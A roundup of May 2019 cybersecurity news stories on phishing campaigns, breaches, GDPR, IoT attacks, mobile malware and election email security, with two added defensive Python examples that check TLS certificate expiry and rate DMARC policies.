The emails were customized for either Canadian organizations or a more general Canadian audience, a May 23 blog post said. One feature included in these malicious emails is the use of fraudulent branding from notable Canadian companies, researchers said. Malicious actors are also leveraging “French-language lures and geo-targeted imposter attacks for ensnaring corporate credentials and banking info.”

Historically, Canada has been swept up in threats aimed at the whole North American region, most of which focus on the US. Based on prior activity, researchers attribute much of the new Canada-specific targeting to the advanced persistent threat (APT) group TA542.

“Much of this is due to Emotet. TA542, the primary actor behind Emotet, is known for the development of lures and malicious mail specific to given regions. However, we also saw customization ranging from French-language lures to brand abuse from a number of actors geo-targeting Canada,” according to the blog post.

Threat actors are also deploying Ursnif, an information-stealing Trojan used largely to harvest online banking credentials. In addition to Emotet and Ursnif, researchers are tracking Canadian campaigns involving other malware strains known as IcedID, The Trick, GandCrab, Danabot, Formbook and Dridex.

When it first appeared back in 2014, Emotet was mostly seen targeting Western European banks. In these more recent campaigns, “Proofpoint researchers observed stolen branding from several notable Canadian companies and agencies including major shipping and logistics organizations, national banks, and large government agencies. Top affected industries in Canada include financial services, energy/utilities, manufacturing, healthcare, and technology.”

Researchers warned that while these ubiquitous phishing attacks and business email compromises (BECs) may be targeting Canada in this particular campaign, “other forms of imposter attacks remain ongoing threats, both internationally and in Canada.”

GDPR: Security Pros Believe Non-Compliance is Rife

Most IT security professionals believe GDPR non-compliance is commonplace, as the landmark data protection legislation turns one tomorrow, according to Infosecurity Europe.

Over 6400 industry practitioners responded to a Twitter poll run by the leading cybersecurity event, which runs from June 4-6.

Some 68% said they thought many organizations have likely not taken the GDPR seriously enough, while nearly half (47%) claimed regulators are being too relaxed when it comes to enforcement.

Recent research indicates that regulator the Information Commissioner’s Office (ICO) has investigated 11,468 data breach cases between May 2018 and March this year, but just 0.25% have led to monetary fines.

On the plus side, only a little over a third (38%) of Infosecurity Europe respondents said GDPR compliance efforts had hindered other cybersecurity plans.

Mark Taylor, partner at Osborne Clarke, claimed that organizations are now turning their attention to the “practicalities of compliance,” but that complications are starting to emerge for multi-nationals.

“First, within a large group, it can be hard to accurately determine the various roles — i.e. data controller and data processor — which the group members have under GDPR. This is important because it determines the relative responsibilities of the group members, and which regulator has jurisdiction over them,” he explained.

“Second, the local laws supplementing GDPR across Europe have adopted variations of GDPR to a greater extent than we might have ideally hoped for. So while GDPR has made international compliance easier, it hasn’t unfortunately made it a one-size-fits-all approach everywhere.”

Taylor also argued that regulators in different jurisdictions are taking a different approach to enforcement.

“Looking forward, I think that enforcement activity will step up, with companies that are undertaking higher-risk processing likely to be most at risk,” he added.

IoT Attacks Cost UK Firms Over £1bn

Cyber-attacks on IoT devices could cost the UK economy over £1 billion each year, according to new research from Irdeto.

The Dutch security vendor polled IT security decision makers at UK organizations in the transport, manufacturing and health sectors, finding that attacks on connected kit caused losses of £244,000 on average.

Along with the headline costs, over half of respondents claimed to have suffered downtime in the past year as a direct result of IoT attacks. Two-fifths (41%) said customer data had been compromised in these raids.

This could present a major compliance challenge if GDPR regulators judge the victim organizations haven’t taken suitable steps to protect customer data. It could also lead to attrition: a third (33%) of respondents said they’d lost customers and 29% claimed their brand's reputation had taken a hit.

Attacks on IoT devices can also have an impact on the physical world, given the increasingly vital role they play in a range of sectors: from drug infusion pumps to connected cars.

Worryingly, 28% of organizations told Irdeto they suffered compromised end-user safety as a result of attacks in the cyber domain.

Irdeto VP of strategic partnerships, Steeve Huin, argued that unsecured IoT endpoints are like low-hanging fruit for cyber-criminals.

“It’s clear that, if not addressed, a lack of IoT security could pose a serious financial threat to the wider UK economy. With so many devices entering the market, and being deployed in critical businesses, the need for improved security measures is without question,” he added.

“Connected device manufacturers must move away from the traditional mindset of ‘build, ship and forget’ and ensure that devices are secure from the very point of design, incorporating multiple layers of security as well as offering regular health checks and software updates. If unsure, consumers should also ask their manufacturers about device security and appropriate measures to keep their information secure.”

This should be easier to do in the future, once the government has introduced a new law designed to improve IoT security.

Announced at the start of May, the proposals aim to improve baseline security standards among manufacturers, and require retailers to add a label to each product explaining whether it has met the standards or not.

Assange Hit with New 18-Count Indictment

The US authorities have slapped Julian Assange with a new 18-count indictment on charges relating to illegally obtaining, retaining and disclosing classified information via WikiLeaks.

The indictment supersedes an earlier charge of hacking the Pentagon, and has drawn criticism from advocates of press freedom.

It could also complicate the UK Home Secretary’s decision on whether to extradite the WikiLeaks co-founder, given that the site ostensibly published the material in the public interest, which Assange’s lawyers argue is protected by the First Amendment in any case.

The charges relate to hundreds of thousands of secret diplomatic cables and other documents related to US wars in Afghanistan and Iraq.

They allege that the 47-year-old conspired with whistleblower Chelsea Manning, a former army intelligence analyst, to obtain and then publish the documents, harming national security.

Crucially, the published trove contained unredacted names of US informants in Iraq and Afghanistan, and US State Department ‘diplomats’ globally, potentially putting them at risk, the DoJ claimed.

It listed 90,000 Afghanistan war-related “significant activity” reports, 400,000 Iraq war-related reports, 800 Guantanamo Bay detainee assessment briefs, and 250,000 US Department of State cables.

The indictment also retains the original charge: that Assange agreed to help Manning crack a password hash stored on US Department of Defense computers connected to the Secret Internet Protocol Router Network (SIPRNet), the military’s classified network.

If convicted on all counts, Assange faces a maximum of 10 years for each of the 17 Espionage Act counts and five years for the computer-intrusion conspiracy count, a total of 175 years.

Last month, Assange was arrested at the Ecuadorian embassy in London after the Metropolitan Police were invited in following the Ecuadorian government’s termination of asylum. He had been holed up there since 2012 after breaching the terms of his bail.

LinkedIn Admits a Delay in Renewing TLS Cert

LinkedIn users noticed on Tuesday that attempts to open links on the site from a desktop or laptop computer were met with a browser warning that the connection was not secure, the result of LinkedIn failing to renew the TLS certificate for its URL shortener, lnkd.in, according to Computer Business Review (CBR).

LinkedIn described the problem as a brief delay in renewing the certificate and said it was fixed quickly once reported. “We had a brief delay in our SSL certification update yesterday, which was quickly fixed, and member data was not affected,” a LinkedIn spokesperson wrote in an email. The new certificate is valid until May 2021.

Forcepoint security analyst, Carl Leonard tweeted:

If you are wondering why your browser is throwing a Certificate Error when navigating around @LinkedIn posts their cert expired a few hours ago on the URL shortener lnkd[.]in. Qualys' SSL check report for that domain: …

Leonard and others noted that this is the second time LinkedIn has let a certificate expire. “Large organizations with hundreds of millions of users globally should be setting the standard for security practices and unfortunately this is the second time that LinkedIn failed to update their SSL certificate, effectively putting user data and privacy at risk,” Leonard reportedly told CBR.

"Certificates control communication and authentication between machines, so it's critically important not to let them expire unexpectedly. Unfortunately, most organizations don’t even have a clear understanding of how many certificates are in use or which devices are using them; so they definitely don't have a clear idea of when they will expire,” said Kevin Bocek, vice president of security strategy and threat intelligence at Venafi.

“This lack of comprehensive visibility and intelligence routinely leads to certificate-related outages; this is not a unique occurrence. Ultimately, companies must get control of all of their certificates; otherwise, it’s only a matter of time until one expires unexpectedly and causes a debilitating outage."
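Bocek's point about not knowing when certificates expire is easy to act on: a scheduled job that inventories the hosts you care about and warns while there is still time to renew. The script below is an added example written for this page, not LinkedIn's or Venafi's tooling. It uses only the Python standard library; the default host list, the 30-day warning threshold and the `notAfter` date in the usage note are assumptions for illustration. One caveat it handles: a certificate that has already expired fails the TLS handshake under default verification, so it is reported as a failure rather than silently skipped.

```python
"""Added example: warn before TLS certificates expire (editor's code,
not LinkedIn's or Venafi's). Standard library only."""
import socket
import ssl
from datetime import datetime, timezone
from typing import Optional, Tuple

WARN_DAYS = 30  # assumption for the example: warn when under 30 days remain


def days_until_expiry(not_after: str, now_iso: Optional[str] = None) -> float:
    """Days left given the 'notAfter' string from ssl getpeercert(),
    e.g. 'May 23 23:59:59 2021 GMT'. now_iso (ISO 8601) pins the clock for tests."""
    expiry = datetime.fromtimestamp(ssl.cert_time_to_seconds(not_after), tz=timezone.utc)
    now = datetime.fromisoformat(now_iso) if now_iso else datetime.now(timezone.utc)
    if now.tzinfo is None:
        now = now.replace(tzinfo=timezone.utc)
    return (expiry - now).total_seconds() / 86400.0


def classify(days_left: float, warn_days: int = WARN_DAYS) -> str:
    """OK, WARN or EXPIRED from the number of days remaining."""
    if days_left < 0:
        return "EXPIRED"
    if days_left < warn_days:
        return "WARN"
    return "OK"


def fetch_not_after(host: str, port: int = 443, timeout: float = 5.0) -> str:
    """Complete a verified TLS handshake and return the leaf cert's notAfter."""
    ctx = ssl.create_default_context()
    with socket.create_connection((host, port), timeout=timeout) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            return tls.getpeercert()["notAfter"]


def check_host(host: str, port: int = 443) -> Tuple[str, str, str]:
    """(host, status, detail); status is OK, WARN, EXPIRED, FAIL or ERROR."""
    try:
        not_after = fetch_not_after(host, port)
    except ssl.SSLCertVerificationError as exc:
        # An expired or otherwise untrusted chain is rejected during the
        # handshake, before notAfter can be read: surface it, do not skip it.
        return (host, "FAIL", f"verification failed: {exc}")
    except OSError as exc:  # DNS failure, refused connection, timeout
        return (host, "ERROR", str(exc))
    days = days_until_expiry(not_after)
    return (host, classify(days), f"{days:.1f} days left (notAfter={not_after})")


if __name__ == "__main__":
    import sys
    # Default targets are assumptions for the usage example only.
    for target in sys.argv[1:] or ["www.linkedin.com", "lnkd.in"]:
        print(*check_host(target))
```

Run it as `python3 cert_expiry.py www.example.com lnkd.in` from cron; each line gives host, status and detail. Wire the WARN and FAIL lines into whatever alerting you already have, and keep the host list in version control so a shortener or forgotten subdomain cannot drop out of the inventory unnoticed. For a certificate with `notAfter` of `May 23 23:59:59 2021 GMT`, checked on 1 May 2021, the classification is WARN with about 23 days left.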

Mobile Banking Malware Rose 58% in Q1

The first quarter of 2019 saw a significant spike in mobile banking malware that steals both credentials and funds from users’ bank accounts, according to researchers at Kaspersky Lab.

“In Q1 2019, Kaspersky Lab detected a 58% increase in modifications of banking Trojan families, used in attacks on 312,235 unique users. Banking Trojans grew not only in the number of different samples detected, but their share of the threat landscape increased as well. In Q4 2018, mobile banking Trojans accounted for 1.85% of all mobile malware; in Q1 2019, their share reached 3.24%,” today’s press release stated. 

Researchers reportedly uncovered 29,841 different modifications of banking Trojans during the first three months of the year, up from 18,501 in Q4 2018. “As is customary, first place in the Top 20 for Q1 went to the DangerousObject.Multi.Generic verdict (54.26%), which we use for malware detected using cloud technologies,” researchers wrote.

“Cloud technologies are deployed when the antivirus databases lack data for detecting a piece of malware, but the company’s cloud already contains information about the object. This is basically how the latest malicious programs are detected.”

The report also noted that a new version of Asacub malware, which was first noted in 2015, accounted for more than half of all banking Trojans that attacked users. Over the past two years, attackers have modified its distribution scheme, which resulted in a spike of the malware in 2018, when it was reportedly used to attack 13,000 users a day. Though distribution has since declined, the malware remains a significant threat, with researchers observing Asacub used to target 8,200 users a day on average.

“The rapid rise of mobile financial malware is a troubling sign, especially since we see how criminals are perfecting their distribution mechanisms,” said Victor Chebyshev, security researcher at Kaspersky Lab. “For example, a recent tendency is to hide the banking Trojan in a dropper – the shell that is supposed to fly to the device under the security radar, releasing the malicious part only upon arrival.”

Fake Trezor App in Google Play Scams Users

Malicious actors have been using a new set of fake cryptocurrency apps on Google Play that are reportedly able to phish and scam users out of cryptocurrency, according to ESET researchers.

Researchers observed one app impersonating Trezor, a hardware cryptocurrency wallet. That app funnels users to a second app, called Coin Wallet – Bitcoin, Ripple, Ethereum, Tether, reportedly created on May 1, which scams unsuspecting users out of money. The fake Trezor app appeared as the second result when searching Google Play for Trezor, according to researchers.

Bitcoin has seen growth this month, with prices inching back up to the $8,000 range. Cyber-criminals were quick to exploit this price boost and got to work targeting users with scams and malicious apps.

“We haven’t previously seen malware misusing Trezor’s branding and were curious about the capabilities of such a fake app. After all, Trezor offers hardware wallets that require physical manipulation and authentication via PIN, or knowledge of the so-called recovery seed, to access the stored cryptocurrency,” explained Lukáš Štefanko, the ESET researcher in a press release.

After analyzing the fake app, researchers noted that the fake Trezor app can’t cause harm to Trezor users because of Trezor’s multiple security layers; however, “it is connected to a fake cryptocurrency wallet app 'Coin Wallet', which is capable of scamming unsuspecting users out of money. Both these apps were created based on an app template sold online,” Štefanko added.

“The app claims it lets its users create wallets for various cryptocurrencies. However, its actual purpose is to trick users into transferring cryptocurrency into the attackers’ wallets – a classic case of what we’ve named 'wallet address scams' in our previous research into cryptocurrency-targeting malware,” said Štefanko.

ESET reported the fake Trezor app to both Google’s security teams and Trezor, which confirmed that the fake app did not pose a direct threat to their users. “However, they did express concern that the email addresses collected via fake apps such as this one could later be misused in phishing campaigns. At the time of writing, neither the fake Trezor app nor the Coin Wallet app are available on Google Play,” today’s press release stated.

UK Political Parties Fail on Email Security Ahead of Elections

The UK’s political parties are largely failing to protect their members from phishing attacks ahead of the European elections, a security vendor has claimed after revealing poor take-up of the DMARC protocol.

Domain-based Message Authentication, Reporting and Conformance, to give it its full title, is widely regarded as a best practice solution to help mitigate the threat of email impersonation.

Although not a silver bullet for email security, it helps to guarantee the legitimacy of the sender, which is why the UK government mandated its use for departments back in 2016, with the US following two years later.

However, according to analysis from Red Sift of all 22 main UK political parties participating in the European Parliament elections, only five had DMARC implemented.

These were the Lib Dems, Labour, the SNP, and two lesser-known organizations: the Socialist Party and the Animal Welfare Party. That means the Conservatives, UKIP, the Brexit Party and others are potentially putting their members at risk of phishing and other email scams.

However, even those that implemented DMARC are not quite there yet: Red Sift detected only “p=none” policies, which are the weakest form of the protocol. It amounts to little more than monitor mode, meaning recipients may still get phishing emails in their inbox — dubious messages are neither sent to the user’s spam folder nor rejected outright.
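The difference between a “p=none” monitor-mode record and an enforcing one can be checked mechanically. The parser below is an added example, not Red Sift’s tooling; the DMARC records it rates are constructed, use placeholder domains, and are embedded inline so it runs offline (a real check would fetch the TXT record at `_dmarc.<domain>`).

```python
"""Parse and rate DMARC TXT records (v=DMARC1 ...) by policy strength."""
import re

# Constructed records for illustration; placeholder domains, not real lookups.
SAMPLE_RECORDS = {
    "party-monitor.example": "v=DMARC1; p=none; rua=mailto:dmarc@party-monitor.example",
    "party-partial.example": "v=DMARC1; p=quarantine; pct=25; sp=none",
    "party-strict.example": "v=DMARC1; p=reject; sp=reject; rua=mailto:dmarc@party-strict.example",
    "party-absent.example": None,  # no _dmarc TXT record published at all
}

# Ordering used to compare the organizational policy with the subdomain policy.
POLICY_RANK = {"none": 0, "quarantine": 1, "reject": 2}


def parse_dmarc(record: str) -> dict:
    """Split 'tag=value; tag=value' into a dict; v=DMARC1 must be the first tag."""
    parts = [p.strip() for p in record.split(";") if p.strip()]
    if not parts or not re.fullmatch(r"v\s*=\s*DMARC1", parts[0], re.IGNORECASE):
        raise ValueError("not a DMARC1 record")
    tags = {}
    for part in parts:
        if "=" not in part:
            raise ValueError(f"malformed tag: {part!r}")
        key, value = part.split("=", 1)
        tags[key.strip().lower()] = value.strip()
    if "p" not in tags:
        raise ValueError("missing required p= tag")
    return tags


def assess(record):
    """Return {'policy', 'enforcing', 'findings'} for one record; None means no record."""
    if record is None:
        return {"policy": None, "enforcing": False,
                "findings": ["no DMARC record: receivers apply no policy at all"]}
    tags = parse_dmarc(record)
    policy = tags["p"].lower()
    if policy not in POLICY_RANK:
        raise ValueError(f"unknown policy {policy!r}")
    findings = []
    pct = int(tags.get("pct", "100"))
    if policy == "none":
        findings.append("p=none: monitor mode only; mail failing DMARC is still delivered")
    elif pct < 100:
        findings.append(f"pct={pct}: policy applied to only {pct}% of failing mail")
    # sp= defaults to the organizational policy; a weaker sp= leaves subdomains spoofable.
    sub = tags.get("sp", policy).lower()
    if POLICY_RANK.get(sub, 0) < POLICY_RANK[policy]:
        findings.append(f"sp={sub}: subdomains get a weaker policy than the main domain")
    if "rua" not in tags:
        findings.append("no rua=: aggregate reports are not being collected")
    enforcing = policy in ("quarantine", "reject") and pct == 100
    return {"policy": policy, "enforcing": enforcing, "findings": findings}


def report(records: dict) -> dict:
    """Assess every domain in a {domain: record-or-None} mapping."""
    return {domain: assess(rec) for domain, rec in records.items()}


if __name__ == "__main__":
    for domain, result in report(SAMPLE_RECORDS).items():
        status = "enforcing" if result["enforcing"] else "NOT enforcing"
        print(f"{domain}: p={result['policy']} ({status})")
        for finding in result["findings"]:
            print(f"  - {finding}")
```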

Randal Pinto, co-founder and COO at Red Sift, described the results of the firm’s analysis as “deplorable.”

“Let’s lay our cards out on the table, the World Economic Forum calls out phishing as one of the most successful methods by which to carry out a cyber-attack, so at a time when election fraud and fake news abound, surely politicians should be taking voter safety into consideration,” he added.

“To have all of the official UK political parties neglect this fundamental defense system is a worrying indicator of their willingness to protect their voters.”

The news follows another security audit of major political parties released this week by SecurityScorecard, which found Sweden’s parties topping the list, with the Liberal Democrats doing best in the UK.

TalkTalk Overlooked Nearly 5000 Customers in Breach Notification

A mishandled 2015 data breach continues to hound TalkTalk after it emerged that the UK telco failed to notify nearly 5000 customers who had been affected.

After being contacted by viewers who suspected their details had been stolen via the telco, consumer rights program Watchdog Live investigated.

It subsequently found their full names, addresses, email addresses, dates of birth, TalkTalk customer numbers, mobile numbers and bank details available on the dark web.

“A recent investigation has shown that 4545 customers may have received the wrong notification regarding this incident. This was a genuine error and we have since written to all those impacted to apologize — 99.9% of customers received the correct notification in 2015,” the firm told the BBC in a statement.

“On their own, none of the details accessed in the 2015 incident could lead to any direct financial loss.”

The latter may be technically true, but it gaslights the issue somewhat, as fraudsters are more than capable of using such details to impersonate their victims in order to elicit more information which could be monetized.

Affected customers told the show they have been the victim of frequent scam calls, while some have suffered attempted identity fraud which has impacted their credit rating.

The original incident involved the compromise of 157,000 customers, including bank account numbers and sort codes for over 15,000 of them.

It led to a £400,000 fine from regulator the ICO after it was found that attackers had exploited a simple SQL injection flaw in web pages that TalkTalk didn’t even know existed.

The firm was also widely criticized for its incident response, sending out confusing messages via a CEO not in possession of all the facts.

TalkTalk’s profits halved following the incident, with the firm paying £42m to cover incident response, external consulting and increasing call volumes as a result of a breach.

UK Invests £22m in Army Cyber Centers as Russian Threat Looms

The UK government has been sharing cyber-intelligence with 16 NATO allies and others outside the alliance on coordinated Russian attempts to probe critical infrastructure and government networks for vulnerabilities, according to Jeremy Hunt.

The foreign secretary will say today at the NATO Cyber Defence Pledge Conference in London that the Kremlin is engaged in a global campaign designed to find IT flaws that could be exploited to cause damage.

“The challenge today is therefore to apply the eternal verities at the heart of NATO’s success to the alliance’s newest operational domain. And that means deterrence – strengthening our joint ability to deter those who would harm our citizens in cyberspace,” Hunt will reportedly say.

The conference is itself testament to the growing threat to member nations from Russian state-sponsored hackers, allowing sharing of best practices and intelligence to counter the rogue nation to the east.

Hunt will also reaffirm the right of NATO states to enact a “proportionate response” to any further attempts to meddle in democratic elections, even if they fall below the Article V threshold which states that an attack against a member nation is considered an attack on all 29 allies.

Cyber was recently added as a legitimate military domain by the alliance.

In related news, the UK government is set to invest £22m in new cyber-operations centers for the army.

Set to launch in 2020, the facility will aim to bridge the gap in capabilities between the security services and the military.

“These new cyber centers will allow the army and defense to transform the way we use data, at speed, so that we can compete with our adversaries in a way fit for the 21st century,” said major general Tom Copinger-Symes, general officer commanding force troops command.

“Combining artificial intelligence with our military analysts will help us better understand threats and exploit opportunities, in turn enabling us to get the truth out much more rapidly, quashing the noise of disinformation from our enemies.”

Fraud Attacks from Mobile Spiked 300% in Q1

Fraud attacks from mobile apps spiked by 300% in the first quarter of 2019, according to new research from RSA.

Published today, the Fraud Attack Trends: Q1 2019 report found that the total fraud attacks from rogue mobile applications on January 1 was 10,390 but had jumped to 41,313 by March 31.

Rogue mobile apps are those designed to duplicate legitimate apps of trusted brands, which are a fast-growing phenomenon among cyber-criminals and a huge digital risk for consumers and businesses, according to the report.

In addition, the report found that fraud attacks introducing financial malware increased 56%, from 6,603 in Q4 2018 to 10,331 in Q1 2019. Of all the fraud attacks RSA observed in the first quarter, phishing accounted for 29%, though the overall phishing volume grew less than 1% quarter over quarter. Phishing’s share of overall fraud attacks therefore fell significantly, which the report attributed to the exponential growth of attacks from rogue mobile apps.

An increasing threat for e-commerce business is fraud attacks on card-not-present (CNP) transactions, which grew by 17% in the first quarter of 2019. Of those attacks, 56% originated from mobile. 

“Canada, Spain and the Netherlands remain the top three countries targeted by phishing, representing 78% of total attack volume. The Philippines appeared on the list, replacing Brazil as a top target with 2% of total phishing volume in Q1,” the report said.

Of all the countries observed, Spain was targeted with a high volume of phishing, which the report attributed to the launch of new innovative digital payment services among many prominent financial institutions, which serves as a reminder that cyber-criminals are looking to exploit digital transformation initiatives.

“The old username/password combination is simply no longer sufficient as a form of consumer authentication. The use of multi-factor, adaptive authentication and transaction risk analysis to watch for signs of fraud based on device, user behavior and other indicators is another critical layer to prevent the onslaught of account takeover in the event of a successful login attempt,” the report said.

Firmware Vulnerability in Mitsubishi Electric

A vulnerability in Mitsubishi Electric’s MELSEC-Q Series Ethernet Module could allow a remote attacker to gain escalated privileges, according to an ICS-CERT advisory.

Reported by Nozomi Networks, the vulnerability “could allow an attacker to render the PLC’s status in fault mode, requiring a cold restart for recovering the system and/or doing privilege escalation or executing arbitrary code in the context of the affected system of the workstation engineering software,” said Nozomi Networks co-founder and CTO Moreno Carullo.

On May 21, the US Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA) issued an ICS-CERT Advisory (ICSA-19-141-0s), noting that the uncontrolled resource consumption vulnerability was exploitable remotely and required a low skill level to exploit.

“Organizations that may be potentially impacted can implement the following National Cybersecurity and Communications Integration Center (NCCIC) mitigations: Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the internet,” Carullo said.

“Locate control system networks and remote devices behind firewalls, and isolate them from the business network. When remote access is required, use secure methods, such as virtual private networks (VPNs), recognizing that VPNs may also have vulnerabilities and should be updated to the most current versions available. Also recognize that VPN is only as secure as the connected devices.”

Mitsubishi Electric has issued a firmware patch and recommends operating the affected device behind a firewall.

NCCIC encourages users to take defensive measures to minimize the risk of exploitation of this vulnerability, noting that users should:

  • Minimize network exposure for all control system devices and/or systems and ensure that they are not accessible from the internet.
  • Locate control system networks and remote devices behind firewalls and isolate them from the business network.
  • Use secure methods when remote access is required, such as VPNs, recognizing that VPNs may have vulnerabilities and should be updated to the most current version available and that a VPN is only as secure as the connected devices.

US May Ban Chinese Surveillance Camera Companies

Citing human rights as the primary concern, the US announced that it is considering adding five Chinese surveillance technology companies, including Hangzhou Hikvision Digital Technology Co. and Zhejiang Dahua Technology Co., to a blacklist that would bar them from buying US components or software, according to The New York Times and Bloomberg.

Hikvision’s cameras are used the world over, which has raised human rights concerns given the recent revelation that nearly 1.2 million Muslims are being detained in camps in Xinjiang, where Hikvision won five contracts worth billions of yuan last year, according to Forbes.

“We hope the company receives a fair and just treatment,” Hikvision’s secretary of the board, Huang Fanghong, reportedly said in a statement. Dahua representatives had no immediate comment, according to Bloomberg.

Evidence supports the claims that Hikvision is involved in the surveillance efforts conducted in Xinjiang, despite the company asserting that it is nothing more than a product provider.

“Hikvision's own website directly contradicts this claim,” wrote Charles Rollet for IPVM. “In 2017, Hikvision proudly posted that it had won a $79 million safe city project in Xinjiang's capital of Urumqi, stating the project included about 30,000 cameras and data centers.

“Bidding documents also show Hikvision itself directly bid and won wide-ranging surveillance projects in Xinjiang. For a $46m project in Xinjiang's Karakax (or Moyu) county, Hikvision is listed as the sole winner in Chinese bidding documents, which even include its headquarters' address in Hangzhou and state the project is 'BOT,' a scheme in which companies Build, Operate, and then Transfer projects to authorities. Hikvision is also listed as the only winner in bidding documents for a different $53 million surveillance project in Pishan County, which also list its Hangzhou address.”

In addition, Hikvision, Dahua and other companies have reportedly “benefited handsomely from Chinese President Xi Jinping’s unprecedented push to keep tabs on the country’s 1.4 billion people,” according to Bloomberg.

In 2016 IHS Markit reported that China had approximately 176 million video surveillance cameras in use across its public streets, buildings and public spaces, more than three times the 50 million used in America, Bloomberg reported.

Google Stored Plaintext Passwords Since 2005

Google has admitted that some of its enterprise customers’ passwords have been erroneously stored in plaintext, in a security issue dating back 14 years.

The tech giant’s VP of engineering, Suzanne Frey, explained that the problem occurred when it introduced a new way for G Suite domain administrators to upload and manually set new passwords for their employees, to help with onboarding and account recovery.

“We made an error when implementing this functionality back in 2005: The admin console stored a copy of the unhashed password. This practice did not live up to our standards,” she added.

“To be clear, these passwords remained in our secure encrypted infrastructure. This issue has been fixed and we have seen no evidence of improper access to or misuse of the affected passwords.”

It’s unclear exactly how many users have been affected by this security snafu: Google would only say that it relates to a “subset of G Suite” customers. No consumer Google accounts were impacted.

Frey’s team also spotted a separate but similar security issue, dating back to the start of this year.

“As we were troubleshooting new G Suite customer sign-up flows, we discovered that starting in January 2019 we had inadvertently stored a subset of unhashed passwords in our secure encrypted infrastructure,” she explained.

“These passwords were stored for a maximum of 14 days. This issue has been fixed and, again, we have seen no evidence of improper access to or misuse of the affected passwords. We will continue with our security audits to ensure this is an isolated incident.”

All G Suite admins impacted by these issues have been notified, and Google said it will reset passwords on any affected account where action is not taken.

Facebook, Twitter and GitHub have all admitted storing user passwords in plaintext over the past year or so. In Facebook's case, hundreds of millions of users are thought to have been affected.

FCA: £27m Lost to Crypto Scams Last Year

The UK’s financial regulator has warned that £27m was lost in the last financial year to scams promising big returns on cryptocurrency and foreign exchange (forex) investments.

The Financial Conduct Authority (FCA) claimed that investors lost on average £14,600 to fraud during the 12-month period, with reports of scams more than tripling to 1800.

This kind of fraud typically starts on social media, where investors are lured by “get rich quick” promises, images of luxury items and celebrity endorsements. Clicking through takes them to legitimate-looking websites where they are tricked into handing over money.

“Investors will often be led to believe that their first investment has successfully made a profit,” warned the FCA.

“The fraudster will then contact the victim to invest more money or introduce friends and family with the false promise of greater profits. However, eventually the returns stop, the customer account is closed and the scammer disappears with no further contact.”

The findings are part of an awareness campaign being run by the FCA, supported by Action Fraud and the City of London police.

Its ScamSmart website is designed to make consumers more skeptical of get rich quick cryptocurrency and forex schemes.

“We’re warning the public to be suspicious of adverts which promise high returns from online trading platforms,” said Mark Steward, executive director of enforcement and market oversight at the FCA.

“Scammers can be very convincing so always do your own research into any firm you are considering investing with, to make sure that they are the real deal. Before investing online find out how to protect yourself from scams by visiting the ScamSmart website, and if in any doubt — don’t invest.”

Anyone that has fallen victim is urged to contact Action Fraud.

A report by Ernst & Young last year revealed that 10% of cryptocurrency ICOs lose their funds to hackers, with phishing a popular way to trick investors into handing over the private keys to their digital wallets.

Lib Dems Come First in UK for Cybersecurity

Sweden’s political parties have the best cybersecurity posture globally, with the UK languishing in the bottom half of the table, according to a new analysis by SecurityScorecard ahead of the European Parliament elections.

Noting the impact of a major data breach at the Democratic National Committee (DNC) which helped to swing the 2016 Presidential election in favor of Donald Trump, the security vendor decided to appraise the security of political parties in the West.

It covered nine countries — the US, France, Germany, Spain, UK, Poland, Italy, Switzerland and Sweden — and two UK nations which have separate domestic parliaments, Northern Ireland and Scotland.

Some 29 political parties were selected for analysis, which covered areas including web app identification, network security and DNS configuration, malware infections, leaked credentials, patching, and more.

“SecurityScorecard found the two major US political parties, Republican National Committee (RNC) and Democratic National Committee (DNC), fared well compared to smaller US political parties and European political parties as a whole,” the report claimed.

“With that said, SecurityScorecard discovered indicators of poor security hygiene in almost all political parties.”

Sweden came top of the 11-country list, with the US in fifth and the UK down in eighth, just three notches above bottom-placed France.

In the UK, the centrist Liberal Democrats were named as the best on cybersecurity, coming top on DNS, network security and patching cadences, although its application security score fared less well.

The Conservative Party was called out for hosting an unencrypted log-in portal for its PureCampaign application.

“Although the credentials are sent to the server via a secure manner, this represents poor security design and presents a risk to a simple MitM or social engineering attack,” the report argued.

In the US, the DNC still appears not to have learned its lesson from 2016.

“While SecurityScorecard believes the DNC has made significant investments in security since 2016, the organizational behavior at managing digital assets still lags behind the RNC,” the report noted.

DHS Issues Alert on Chinese-Made Drones

Chinese-made drones may be sending sensitive flight data to their manufacturers in China, according to an alert issued by the US Department of Homeland Security (DHS), CNN reported on May 20.

In a copy of the alert obtained by CNN, DHS said, "The United States government has strong concerns about any technology product that takes American data into the territory of an authoritarian state that permits its intelligence services to have unfettered access to that data or otherwise abuses that access.”

While the report refrains from naming specific manufacturers, approximately 80% of the drones used in the US and Canada reportedly come from DJI in Shenzhen, China. DHS reportedly is concerned about "potential risk to an organization's information…[from products that] contain components that can compromise your data and share your information on a server accessed beyond the company itself," according to CNN.

"Those concerns apply with equal force to certain Chinese-made (unmanned aircraft systems)-connected devices capable of collecting and transferring potentially revealing data about their operations and the individuals and entities operating them, as China imposes unusually stringent obligations on its citizens to support national intelligence activities," the alert reportedly added.

“The Department of Commerce required Google to pull rights to use Google Play and apps on Android from Huawei. Now, we are hearing about risks of Chinese-made drones, of which the primary manufacturer is DJI, based in China,” said Chris Morales, head of security analytics at Vectra.

“The overall theme is that a third-party manufacturer could be using personal data for malicious intent. This is a theme that should expand beyond just a specific nation state actor. This is a real concern for any device that is collecting data on a user, regardless of where they are based.

“It doesn’t mean everyone is bad, though. Most organizations are in the business of making money and are not intentionally causing harm to consumers. Personally, I don’t even like enabling features, such as location services, on my personal device that gives even American companies too much data about me and my own personal habits.”

Ransomware Not Gone but More Targeted, Report Says

Cyber-criminals continue to grow more sophisticated, developing advanced attack methods, including tailored ransomware, according to the Q1 Global Threat Landscape Report, published today by Fortinet. In addition to targeted attacks, criminals are also using custom coding, living-off-the-land (LotL) and sharing infrastructure to maximize their opportunities, the report said.

Despite a decline in previous high rates of ransomware, ransomware itself is far from gone. Instead, cyber-criminals are using more targeted attacks. Ransomware “is being customized for high-value targets and to give the attacker privileged access to the network. LockerGoga is an example of a targeted ransomware conducted in a multi-stage attack. There is little about LockerGoga that sets it apart from other ransomware in terms of functional sophistication, but while most ransomware tools use some level of obfuscation to avoid detection, there was little of it used when analyzed,” the report said.

Researchers also detected an uptick in malicious actors leveraging dual-use tools preinstalled on targeted systems to carry out cyber-attacks.

The report noted the trend of shared infrastructure. Researchers detected a rise in the total malware and botnet communication activity, as well as the number of domains shared between threats at each stage of the kill chain.

